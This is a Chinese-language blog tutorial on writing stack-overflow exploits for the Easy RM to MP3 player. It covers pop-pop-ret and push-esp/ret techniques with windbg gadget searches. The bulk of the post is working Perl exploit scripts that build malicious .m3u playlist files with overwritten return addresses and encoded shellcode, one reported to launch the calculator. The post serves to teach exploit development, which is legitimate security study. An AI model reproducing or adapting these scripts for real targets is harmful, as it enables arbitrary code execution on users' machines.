<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="xiaoeryu">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://xiaoeeyu.github.io/2021/05/20/exploit编写系列2：栈溢出，跳转至shellcode/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="exploit编写系列2：栈溢出，跳转至shellcode这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法：  jump&#x2F;call	寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call">
<meta property="og:type" content="article">
<meta property="og:title" content="exploit编写系列2：栈溢出，跳转至shellcode">
<meta property="og:url" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/index.html">
<meta property="og:site_name" content="xiaoeryu">
<meta property="og:description" content="exploit编写系列2：栈溢出，跳转至shellcode这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法：  jump&#x2F;call	寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231000901339-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231004613153-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210102172628709-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210112215736411-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210113231801856-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210129232150356-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210131221051399-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210206000619469-1621477705987.png">
<meta property="article:published_time" content="2021-05-20T02:27:25.000Z">
<meta property="article:modified_time" content="2023-11-17T11:36:43.622Z">
<meta property="article:author" content="xiaoeryu">
<meta property="article:tag" content="exploit编写">
<meta property="article:tag" content="溢出类型漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/rabete.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/rabete.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/rabete.jpg">
    <!--- Page Info-->
    
    <title>
        
            exploit编写系列2：栈溢出，跳转至shellcode | xiaoeryu
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"xiaoeeyu.github.io","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":4,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/ball-0101.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-jxl31y.png","dark":"/images/wallhaven-o5762l.png"},"title":"XIAOERYU","subtitle":{"text":["明心见性，拨云见日","Don't wait, to create"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/xiaoeeyu","instagram":null,"zhihu":null,"twitter":null,"email":"xiaoeryu@163.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
                <a class="logo-image h-8 w-8 sm:w-10 sm:h-10 mr-3" href="/">
                    <img src="/images/rabete.jpg" class="w-full h-full rounded-sm">
                </a>
            
            <a class="logo-title" href="/">
                
                xiaoeryu
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    归档
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                归档
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">92</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">14</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">112</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">exploit编写系列2：栈溢出，跳转至shellcode</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/rabete.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">xiaoeryu</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv5</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2021-05-20 10:27:25</span>
        <span class="mobile">2021-05-20 10:27:25</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-11-17 19:36:43</span>
            <span class="mobile">2023-11-17 19:36:43</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Win%E9%80%86%E5%90%91/">Win逆向</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/exploit%E7%BC%96%E5%86%99/">exploit编写</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E6%BA%A2%E5%87%BA%E7%B1%BB%E5%9E%8B%E6%BC%8F%E6%B4%9E/">溢出类型漏洞</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="exploit编写系列2：栈溢出，跳转至shellcode"><a href="#exploit编写系列2：栈溢出，跳转至shellcode" class="headerlink" title="exploit编写系列2：栈溢出，跳转至shellcode"></a>exploit编写系列2：栈溢出，跳转至shellcode</h1><p>这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp</p>
<p>执行shellcode的多种方法：</p>
<ol>
<li>jump/call	寄存器</li>
<li>pop return</li>
<li>push return</li>
<li>jmp[reg + offset]</li>
<li>blind return</li>
<li>jmp code</li>
<li>SHE</li>
<li>call</li>
</ol>
<span id="more"></span>

<hr>
<h3 id="1-jmp-x2F-call-寄存器"><a href="#1-jmp-x2F-call-寄存器" class="headerlink" title="1. jmp/call 寄存器"></a>1. jmp/call 寄存器</h3><p>在第一篇中已经详细分析过</p>
<h3 id="2-pop-pop-ret"><a href="#2-pop-pop-ret" class="headerlink" title="2. pop pop ret"></a>2. pop pop ret</h3><p>这个exp我们依然还使用上一篇分析的Easy RM to MP3的漏洞来编写，在上一章使用jmp register 编写exp的时候，我们已经能够调整缓冲区，使ESP直接指向我们的shellcode。但是如果shellcode入口发生偏移比如：shellcode的入口位于ESP+8的时候，我们又该怎么去编写exp呢？理论上，当ESP+offset已经包含shellcode地址，那么只有pop ret这种方法使可行的….如果不是如此（事情往往并非如此），那么也许还有其他方法。</p>
<p>接下来我们尝试采用pop pop ret的方式来重新调整一下shellcode，在上一章的调试中我们已经知道了覆盖EIP需要26067byte，另外在ESP指向的栈地址（0x000ffd38）前还需要4byte。为了模拟出shellcode起始于ESP+8的假象，我们需要构造出一块栈情况如下的缓冲区：</p>
<p>26067xA，XXXX，INT3中断，7NOP，INT3中断，后面放一些NOP。</p>
<p>这样排列我们就可以将真正的shellcode放置于ESP+8后。</p>
<p>先按上面的思路编写一下我们的shellcode</p>
<pre><code class="perl">my $file= "test1.m3u";
my $junk= "A" x 26067;
my $eip = "BBBB"; #overwrite EIP
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\xcc"; #first break
$shellcode = $shellcode . "\x90" x 7; #add 7 more bytes
$shellcode = $shellcode . "\xcc"; #second break
$shellcode = $shellcode . "\x90" x 500; #real shellcode
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>用Easy RM to MP3打开生成的test1.m3u，中断之后查看一下堆栈，现在中断于EIP我们填写的”BBBB”处，输入<code>d esp</code>查看一下栈的排列，esp指向0x000ffd38处，里面的内容跟我们刚来编写的代码一致：0xCC + 7个0x90 + 0xCC + 500个0x90（shellcode）</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png" class="" title="image-20201229004417938">

<p>为了让EIP直接跳往EIP+8（我们的payload处），我们需要使用pop ret技术+jmp esp地址来完成此项任务。</p>
<p>一个pop指令可以将栈顶弹出四个byte，我们需要两个pop指令就可以将ESP+8（0x000ffd38+8 = 0x000ffd40）,此时再执行ret指令就会将当前ESP的值（0x000ffd40）赋予EIP。如果在此时的ESP（0x000ffd40)处包含有jmp esp指令的地址，那么此时EIP就将会执行jmp esp指令跳转到此时的ESP（0x000ffd40)处，这样的话我们就必须把我们的shellcode放置在0x000ffd40后面的缓冲区中。</p>
<p>接下来我们需要先找到一个可用的pop pop ret指令的地址，用这串指令的首地址来覆盖EIP，然后在ESP+8处放入jmp esp指令的地址，再后面紧跟着的就是shellcode了。</p>
<p>重新打开Easy RM to MP3然后使用windbg附加进程，使用windbg的汇编功能来搜索一下 pop pop ret指令的位置</p>
<pre><code>ntdll!DbgBreakPoint:
7c92120e cc              int     3
0:010&gt; a
7c92120e pop eax
pop eax
7c92120f pop ebp
pop ebp
7c921210 ret
ret
7c921211 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e 58              pop     eax
7c92120f 5d              pop     ebp
7c921210 c3              ret
7c921211 ffcc            dec     esp
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
</code></pre>
<p>我们可以查到pop eax, pop ebx, ret三条指令对应的机器码为：0x58 0x5d 0xc3</p>
<p>然后我们可以在加载的DLL里面查找包含这三条指令的地址</p>
<p>重新打开windbg并加载Easy RM to MP3</p>
<p>在加载的DLL里面搜索我们需要的指令，这里关于DLL的选择如果每次DLL加载的基址都相同的话我们就选择应用程序的DLL如果每次加载的基址都会改变的话，就选择系统的DLL会更好点</p>
<p>需要注意的是我们选择的地址尽量不要包含有”00”</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231000901339-1621477705987.png" class="" title="image-20201231000901339">

<p>现在我们可以使用上面搜索到的地址让我们跳转到ESP+8，现在我们需要在ESP+8处填入jmp esp的地址（前面解释过，ret指令将从这里获取地址，并将其赋值给EIP执行）。</p>
<p>用同样的方法来搜索一下 jmp esp的地址</p>
<pre><code>0:010&gt; s 01940000 l 019b1000   ff e4
01b7f23a  ff e4 ff 8d 4e 10 c7 44-24 10 ff ff ff ff e8 f3  ....N..D$.......
01bb023f  ff e4 fb 4d 1b a6 9c ff-ff 54 a2 ea 1a d9 9c ff  ...M.....T......
01bcd3db  ff e4 ca b9 01 20 05 93-19 09 00 00 00 00 d4 bc  ..... ..........
01beb22a  ff e4 07 07 f2 01 57 f2-5d 1c d3 e8 09 22 d5 d0  ......W.]...."..
01beb72d  ff e4 09 7d e4 ad 37 df-e7 cf 25 23 c9 a0 4a 26  ...}..7...%#..J&amp;
</code></pre>
<p>此时我们可以将EIP执行到ESP指向的位置了，接下来我们需要用真正的shellcode替换掉原来的500个NOP。</p>
<p>替换后的缓冲区情况如下：</p>
<table>
<thead>
<tr>
<th>AAAAAAAAAAAAAAAAAA…</th>
<th>0x01966a10</th>
<th>NOP NPO</th>
<th>0x01b7f23a</th>
<th>SHELLCODE</th>
</tr>
</thead>
<tbody><tr>
<td>26067</td>
<td>EIP</td>
<td>8 BYTE OFFSET</td>
<td>JMP ESP</td>
<td></td>
</tr>
<tr>
<td></td>
<td>POP POP RET</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<p>现在我们构造的exp执行情况如下：</p>
<ol>
<li>EIP被pop pop ret 指令的地址覆盖，ESP会指向shellcode偏移8字节的地址；</li>
<li>pop pop ret被执行之后，EIP会被ESP+8处的（jmp esp）0x01b7f23a指令覆盖，ESP指向shellcode；</li>
<li>由于EIP被jmp esp指令的地址覆盖，因此程序会跳转到shellcode执行。</li>
</ol>
<pre><code class="perl">my $file= "test3.m3u";
my $junk= "A" x 26067;
my $eip = pack('V',0x01966a10); #overwrite EIP
my $jmpesp = pack('V',0x01b7f23a);
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
#my $shellcode = "\xcc"; #first break
$shellcode = "\x90" x 8; #add 7 more bytes
$shellcode = $shellcode . $jmpesp; #second break

$shellcode = $shellcode . "\x90" x 50; #real shellcode
$shellcode = $shellcode . 
"\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>成功的执行了shellcode弹出了计算器</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231004613153-1621477705987.png" class="" title="image-20201231004613153">

<h3 id="3-push-return"><a href="#3-push-return" class="headerlink" title="3. push return"></a>3. push return</h3><p>push ret与call [reg]有些相似，如果有个寄存器指向你的shellcode，但是由于某些原因你无法使用jmp[reg]去跳转到shellcode，可以采用：</p>
<ul>
<li>将寄存器地址压入栈中，它将位于栈顶</li>
<li>ret（从栈中获取返回地址，并跳转到该地址）</li>
</ul>
<p>为了实现这种方法，你需要用某个dll中的push [reg] + ret 指令串地址去覆盖EIP。为了直接将使用的shellcode放入ESP中，你首先需要搜索‘push esp’和‘ret’的机器码。</p>
<h4 id="0x00-重新运行Easy-RM-to-MP3并用windbg附加"><a href="#0x00-重新运行Easy-RM-to-MP3并用windbg附加" class="headerlink" title="0x00 重新运行Easy RM to MP3并用windbg附加"></a>0x00 重新运行Easy RM to MP3并用windbg附加</h4><p>用windbg的汇编搜索功能来寻找一段<code>push esp</code>&amp;<code>ret</code>指令</p>
<pre><code>0:010&gt; a
7c92120f push esp
push esp
7c921210 ret
ret
7c921211 

0:010&gt; u 7c92120f 
ntdll!DbgBreakPoint+0x1:
7c92120f 54              push    esp
7c921210 c3              ret
7c921211 ffcc            dec     esp
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
7c92121b c20400          ret     4
</code></pre>
<p>可以看到指令对应的机器码为<code>54 c3</code>，然后我们可以从加载的dll里面搜索一条可用的指令地址</p>
<pre><code>0:010&gt; s 01940000 l 019b1000   54 c3
019557f6  54 c3 90 90 90 90 90 90-90 90 8b 44 24 08 85 c0  T..........D$...
01a01d88  54 c3 fe ff 85 c0 74 5d-53 8b 5c 24 30 57 8d 4c  T.....t]S.\$0W.L
01a2cd65  54 c3 8b 87 33 05 00 00-83 f8 06 0f 85 92 01 00  T...3...........
01a2cf2f  54 c3 8b 4c 24 58 8b c6-5f 5e 5d 5b 64 89 0d 00  T..L$X.._^][d...
01a2cf44  54 c3 90 90 90 90 90 90-90 90 90 90 8a 81 da 04  T...............
</code></pre>
<p>选择一个地址，构造exp并运行(直接用call [reg]的exp，将eip修改为我们刚找到的指令地址即可)</p>
<pre><code class="perl">my $file= "test_5.m3u";
my $junk= "A" x 26067;
my $eip = pack('V',0x019557f6); #overwrite EIP with call esp
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 25; #start shellcode with some NOPS
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
